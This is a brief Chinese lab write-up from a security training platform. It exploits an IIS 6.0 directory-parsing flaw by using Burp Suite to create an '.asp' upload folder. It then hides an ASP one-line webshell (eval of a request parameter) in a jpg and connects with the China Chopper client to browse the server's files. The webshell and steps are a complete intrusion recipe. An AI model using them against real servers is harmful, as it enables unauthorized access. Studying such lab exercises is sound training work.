墨者学院--内部文件上传系统漏洞分析溯源
学习IIS6.0存在的文件上传漏洞, 学习使用burpsuite和菜刀工具
1、首先确定拿到目标是一个只有上传文件的网页,尝试上传文件会发现asp,php等文件不能上传。txt,jpg文件可以上传。

2、使用burpsuite分析上传请求
a、目标服务器是IIS 6.0, 相关漏洞:只要是有 .asp结尾的文件夹,里面的文件都可以被作为asp文件解析(两种方法:文件解析和目录解析)
b、观察到文件上传后会自动重命名,所以只能目录解析
c、问题在于如何在服务器创建.asp文件夹?----分析请求中上传目录,尝试将upload目录更改为upload/1.asp,并重新发送请求。
发现上传成功了,而且在upload目录下创建了1.asp目录

3、上传asp的一句话木马
将一句话木马(<%eval request ("pass")%>)写入jpg文件中,并上传到.asp目录中, 并记住文件名,记住木马中密码 pass

4、使用工具“中国菜刀”破解进入目标系统目录
在菜刀地址中写入上传文件的url和密码pass


在创建连接上右击管理就能直接跳转到目标文件系统,就此破解完成


浙公网安备 33010602011771号